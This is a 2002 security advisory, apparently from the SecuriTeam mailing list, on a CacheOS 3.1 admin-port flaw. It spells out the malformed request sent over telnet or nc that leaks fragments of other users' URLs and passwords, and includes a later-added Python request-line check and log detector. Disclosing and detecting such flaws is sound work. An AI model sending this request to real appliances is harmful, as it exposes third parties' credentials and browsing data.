[UNIX] Web Administration Vulnerability in CacheOS

From: support@securiteam.com
Date: 01/09/02


From: support@securiteam.com
To: list@securiteam.com
Date: Wed,  9 Jan 2002 21:32:31 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Web Administration Vulnerability in CacheOS
------------------------------------------------------------------------

SUMMARY

 <http://www.cacheflow.com/> CacheOS is the operating system of the web
caching appliances made by CacheFlow; the appliance itself is an Intel based
box with a RAID array running this custom OS. The CacheFlow exposes a
web-admin interface on port 8081 by default. By sending a particular
malformed request to that port, attackers can view fragments of web pages
and URLs passing through the cache at that moment. Data that may be gathered
this way includes usernames/passwords, form contents and URLs.

DETAILS

Vulnerable systems:
CacheOS version 3.1

Example:
Telnet or use nc to connect to port 8081, then issue the following
command:

GET /Secure/Local/console/cmhome.htm

A well-formed HTTP request line would also carry a version such as HTTP/1.0
at the end of that string; if you supply it, the cache replies that the
station is not authorized to view the page. If you omit HTTP/1.0, as shown
above, most of the time the cache just issues this:

localhost:~# telnet cacheflow 8081
Trying xxx.xxx.xxx.xxx...
Connected to cacheflow.
Escape character is '^]'.
GET /Secure/Local/console/cmhome.htm

HTTP/1.0 200 OK

Request cannot be honored
Connection closed by foreign host

However, if you try multiple times it will sometimes return something like
this:

localhost:~# telnet cacheflow 8081
Trying xxx.xxx.xxx.xxx...
Connected to cacheflow.
Escape character is '^]'.
GET /Secure/Local/console/cmhome.htm

HTTP/1.0 404-Not Found

<HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The
requested URL "/Secure/Local/console/cmhome.htm

Easp&o=0&sv=za5cb0d78&qid= E2BCA8F417ECE94DBDD27B75F951FFDA&uid=
2c234acbec234acbe&sid=3c234acbec234acbe&ord=1" was not found on this
server.<P></BODY>Connection closed by foreign host.

As you can see, the data echoed back in the 404 page contained part of a URL
that a client of the cache was visiting at the time. We have also been able
to read passwords from URLs using this technique.
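The advisory's observation is that a version-less request line ("GET /path" with no "HTTP/1.0") bypasses the authorization answer the admin interface gives to a well-formed request, and that the leak shows up only after repeated attempts. The following is an added example, not code from the advisory or from CacheFlow: a request-line check of the kind a hardened admin interface should apply (refuse version-less request lines outright and enforce authorization on the /Secure/ console path regardless of request shape), followed by a detector that runs over constructed admin-port log lines and flags clients that repeatedly send version-less requests to port 8081. The log format ("<client> <port> <request line>"), the client addresses and the threshold are assumptions made for the example.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Request-line grammar: METHOD SP target [SP HTTP/x.y]. The version group is
# optional so that a bare "GET /path" (HTTP/0.9 style) still parses and can be
# classified, instead of being handled by whatever fallback the server has.
REQUEST_LINE = re.compile(
    r"^(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<version>HTTP/\d\.\d))?$"
)

# Admin console path prefix taken from the advisory's example URL.
ADMIN_PREFIX = "/Secure/"


@dataclass(frozen=True)
class Verdict:
    allowed: bool
    reason: str


def check_request_line(line: str, client_authorized: bool = False) -> Verdict:
    """Decide whether a request line on the admin interface may proceed.

    Two rules: a request line without an HTTP version is refused before any
    other processing, and authorization on admin paths is enforced no matter
    how the request line is shaped.
    """
    m = REQUEST_LINE.match(line.rstrip("\r\n"))
    if m is None:
        return Verdict(False, "malformed request line")
    if m.group("version") is None:
        # The version-less form is the trigger the advisory describes.
        return Verdict(False, "HTTP/0.9-style request (no version) refused")
    if m.group("target").startswith(ADMIN_PREFIX) and not client_authorized:
        return Verdict(False, "admin path requires authorization")
    return Verdict(True, "ok")


# Constructed sample log lines (hypothetical format: "<client> <port> <request line>").
# One client hammers the console path without a version; another sends a
# well-formed request; a third talks to the ordinary proxy port.
SAMPLE_LOG = """\
10.0.0.5 8081 GET /Secure/Local/console/cmhome.htm
10.0.0.5 8081 GET /Secure/Local/console/cmhome.htm
10.0.0.5 8081 GET /Secure/Local/console/cmhome.htm
10.0.0.9 8081 GET /Secure/Local/console/cmhome.htm HTTP/1.0
10.0.0.7 8080 GET http://www.example.com/ HTTP/1.0
10.0.0.5 8081 GET /Secure/Local/console/cmhome.htm
"""

LOG_LINE = re.compile(r"^(?P<client>\S+) (?P<port>\d+) (?P<request>.+)$")


def suspicious_clients(log_text: str, admin_port: int = 8081, threshold: int = 3) -> dict:
    """Count version-less request lines sent to the admin port per client and
    return the clients at or above `threshold`; the advisory notes the leak
    only appears after several tries, so a repeat count is the useful signal."""
    counts: Counter = Counter()
    for raw in log_text.splitlines():
        m = LOG_LINE.match(raw)
        if m is None or int(m.group("port")) != admin_port:
            continue
        verdict = check_request_line(m.group("request"))
        if verdict.reason.startswith("HTTP/0.9"):
            counts[m.group("client")] += 1
    return {client: n for client, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    print(check_request_line("GET /Secure/Local/console/cmhome.htm"))
    print(check_request_line("GET /Secure/Local/console/cmhome.htm HTTP/1.0"))
    print(suspicious_clients(SAMPLE_LOG))
```

The check refuses the version-less form with its own reason string, which is what the detector keys on; a real deployment would read the request lines from the appliance's access log rather than an embedded string, but the classification logic is the same.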

Vendor status:
support@cacheflow.com was contacted on 10/31/2001 and quickly replied asking
for more information; however, no information on patches or fixes was ever
supplied.

ADDITIONAL INFORMATION

The information has been provided by <mailto:bugtraq@svindel.net> Bjorn
Djupvik.
